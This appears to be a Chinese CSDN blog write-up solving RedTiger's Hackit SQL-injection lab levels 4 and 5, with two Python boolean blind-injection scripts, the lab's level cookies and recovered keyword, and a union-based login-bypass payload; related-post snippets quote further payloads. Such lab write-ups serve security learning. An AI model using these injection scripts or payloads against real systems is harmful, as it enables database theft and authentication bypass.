redtiger sql注入

最新推荐文章于 2024-09-14 19:00:09 发布
最新推荐文章于 2024-09-14 19:00:09 发布
阅读量229 收藏
点赞数
分类专栏: ctf 文章标签: sql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yy652/article/details/109637362
版权

level4

简单测试,id存在注入点,id=1 and 1=1通过,判断是布尔。

根据Query returned 0 rows. 或Query return 1 rows.进行盲注。

id=1 and 1=(select length(keyword)=21 from level4_secret)  字段长度为21。

这个地方,猜一下数,一般不会太长,也可以爆破一下(不太会写,随便看看)

import requests
import re

url = 'http://redtiger.labs.overthewire.org/level4.php?'
data1 = 'id=1 and 1=(select length(keyword)='
data2 = ' from level4_secret)'
num = 1
headers = {
    'Referer': 'http://redtiger.labs.overthewire.org/level4.php'
}
cookies = {
    "level2login": "passwords_will_change_over_time_let_us_do_a_shitty_rhyme",
    "level3login": "feed_the_cat_who_eats_your_bread",
    "level4login": "put_the_kitten_on_your_head"
}

while num < 100:
    dataNew = url + data1 + str(num) + data2
    response = requests.get(url=dataNew, headers=headers, cookies=cookies)
    if re.findall('Query returned 1 rows', response.text):
        print(num)
        exit(0)
    num = num + 1

接下来必须爆破了,写个循环

import requests
import re

url = 'http://redtiger.labs.overthewire.org/level4.php?'
data = 'id=1 and (1=(ascii(substr((select keyword from level4_secret limit 1),{0},1))={1}))'
headers = {
    'Referer': 'http://redtiger.labs.overthewire.org/level4.php'
}
cookies = {
    "level2login": "passwords_will_change_over_time_let_us_do_a_shitty_rhyme",
    "level3login": "feed_the_cat_who_eats_your_bread",
    "level4login": "put_the_kitten_on_your_head"
}
url = url + data
keyword = ""
for i in range(1, 22):
    for c in range(1, 127):
        urls = url.format(i, c)
        response = requests.get(url=urls, headers=headers, cookies=cookies)
        if re.findall('Query returned 1 rows.', response.text):
            print(i, c)
            keyword = keyword + chr(c)
            break
print(keyword)

运行是真的慢,大佬们有没有提速方法?

 killstickswithbr1cks!

level5

使用' union select 1,2,...可以试出只有两个字段

username=' union select 1,md5(1)#构建自己的用户名和md5密码,password=1可通过

 

不卷毛
关注
专栏目录
Redtiger解题技巧(一)
Lorezon的博客
10-12 1888
(写这个博客本意就是为了自我总结,然后顺便试试新买的键盘。博主本人其实也就是个菜鸟,所以希望前辈们多多指导) 第一关: 根据提示,username=Hornoxe,给了Tablename: level1_users ok。我们先查看源码(看源码是我个人习惯,因为常常能在源码里发现意想不到的东西) 会发现一个有意思的东西:?cat=1 ok。返回答题关,构造语句 http://redtiger.la...
SQL注入教程——(三)简单的注入尝试
热门推荐
hijack89的博客
07-26 1万+
本文将以简单的SQL注入实例来讲解SQL注入的基本思路与流程,当然本文实例只是注入的一种情况,初学者应重点理解思路,学会举一反三。GET与POST进行SQL注入攻击,大家还需要了解两种基本的 HTTP 请求方法:GET 和 POST。在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST。 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据
redtigerSQL注入
EmilSinclair4391的博客
08-17 495
http://blog.spoock.com/2016/07/25/redtiger-writeup/
Redtiger SQL注入练习(一)
weixin_30906425的博客
11-03 278
感觉会的东西太少了,以后要多练习,多写博客。要坚持学习,一定不能放弃,为梦想奋斗。 redtiger 这个平台早就开始做了,但是才做到第4关。。。。 第一关: 打开题, 先随便试,后来发现点击 Category 后的1 可以注入, 然后就是注入了,构造cat=1'' 还报错,估计是数字型注入,然后构造cat=1 order by 1猜列数,得出是4个。 cat=1 ...
RedTiger level1-10做题心得与解法
xzz2333的博客
11-11 9384
level 1 从Category注入,数字型 order by 4 union select 1,2,3,4 无法查看information.schema 猜测level1_users的列名,没有user列或者说屏蔽了,因此猜测是password的第一条 select group_concat(column_name) from information_schema.columns where table_name = 0x6C6576656C315F7573657273 select password
SQL注入靶场 RedTiger通关教程(level1~level10)
0xuu的博客
07-07 1151
SQL注入靶场RedTiger's Hackit 通关教程;RedTiger通关教程(level1~level10)
mysql 登录框注入_CTF| SQL注入之login界面类
weixin_34609222的博客
01-19 2550
SQL注入是CTF的WEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。万能密码—very easy题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php题目来源:hacking lab inject 01~源代码有提...
RedTiger‘s Hackit
Alita_lxz的博客
11-02 1445
RedTiger’s Hackit http://redtiger.labs.overthewire.org/ Level 1 Simple SQL-Injection 打开对应连接,是一个登录页面,先是告诉我们登录的用户名是什么,然后给了一个提示,把表名level1_users给出来了,现在就是要找注入点在哪里了,看到Category:后的1可以点击 点击之后出来cat=1,这就很明显了 试了一大顿,发现这个1后竟然不需要闭合引号,根据order by 得出表有4列 本来想爆一下列名,可能是有参数被
RedTiger's Hackit(level2)
xz913400155的博客
12-11 500
第二关 简单的sql绕过 https://redtiger.labs.overthewire.org/ 进入第二关 给的目标是登入 提示是条件 然后就给了用户名及密码两个输入框 很容易就联想到输入内容就是查询语句中where的判断条件 账号密码一般都是用字符串格式 所以猜测where语句差不多是如下格式 where username=‘我们的输入’ and password=‘我们的输入’ 然...
靶场笔记之sql注入石器篇1
快乐时光
04-22 542
前言 偶然发现了https://redtiger.labs.overthewire.org/网站,上面有关于sql注入的练习,分level1到level10,可依次进行练习。 本篇先介绍level1至level5的题目,可动手操作起来。 level 1 点击level 1进入https://redtiger.labs.overthewire.org/level1.php页,尝试了username和passwd没有发现任何问题,后来发现网站上有个Category:1的可...
writeup--RedTiger's Hackit
charlie_heng的专栏
12-19 4194
RedTiger’s Hackit第一关首先点进Category 1 网址后面跟了?cat=1,很明显是一个sql注入 看了下还给了表名。。Tablename: level1_users 构造了下 https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from le
RedTiger's Hackit wirteup
a370793934的专栏
11-28 677
sql注入挑战 level1 简单注入,payload: http://redtiger.labs.overthewire.org/level1.php?cat=0 union select 1,2,username,password from level1_users 返回 Hornoxe thatwaseasy 登录后显示 You made it! You can raise...
Redtiger Hackit Writeup
weixin_30326515的博客
08-09 814
RedTiger's Hackit Level 1 Welcome to level 1 Lets start with a simple injection. Target: Get the login for the user Hornoxe Hint: You really need one? omg -_- Tablename: level1_users ...
OverTheWire的Natas题
公众号shadow sock7
11-06 1331
题目: http://overthewire.org/wargames/natas/ Write-up: http://perso.heavyberry.com/articles/2014-01/natas禁用上下文按钮(右键)<body oncontextmenu="javascript:alert('right clicking has been blocked!');return fal
sql注入教程和php弱类型
xuchen16的博客
09-30 461
转载自:https://blog.csdn.net/helloc0de/rss/list   [原]SQL注入教程——(四)宽字节注入 前言 在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版...
redtiger 注入练习 writeup
dkfagk4904的博客
07-30 349
目前进度前两题,过程后续补上。 第一题: http://redtiger.labs.overthewire.org/level1.php 1 union select 1,2,username,password from level1_users You can raise your wechall.net score with this flag: XXXX The passw...
CTF学习路线指南(附刷题练习网址)
diesha9164的博客
09-28 2174
PWN,Reverse:偏重对汇编,逆向的理解; Gypto:偏重对数学,算法的深入学习; Web:偏重对技巧沉淀,快速搜索能力的挑战; Mic:则更为复杂,所有与计算机安全挑战有关的都算在其中 常规做法;   A方向:PWN+Reverse+Gypto,随机搭配;   B方向:Web+Misc组合; 都要学的内容:   Linux基础、计算机组成原理,操作系...
CTF
煮酒闲谈
10-18 6002
摘要CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。 其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。 为了方便称呼,我们把这样的内容称之为“Flag”。 CTF对于我们的意义1:CTF类似于奥数2:能力提升思维能力 快速学习能力 技术能力
SQL注入大闯关笔记
Sean的博客
03-17 2712
目录前言一、SQL注入是什么?二、靶场是什么?三、挖掘漏洞1.redtiger靶场1.第一关2.第二关3.第三关总结 前言 随着国家对安全越来越重视,个人感觉每个人都需要了解一下安全方面的知识。学习安全,先要从靶场做起,说干就干。 一、SQL注入是什么? 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻
navicate远程linux上的pgsql提示密码失败
最新发布
记录、分享、合作、共赢
09-14 231
2、postgresql.conf文件中,修改listen_addresses。3、重启pgsql,例如:systemctl restart pgsql。1、pg_hba.conf文件中,ipv4下面的内容改成。4、如果问题还在,检查firewalld防火墙,执行。5、再次尝试连接,成功!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值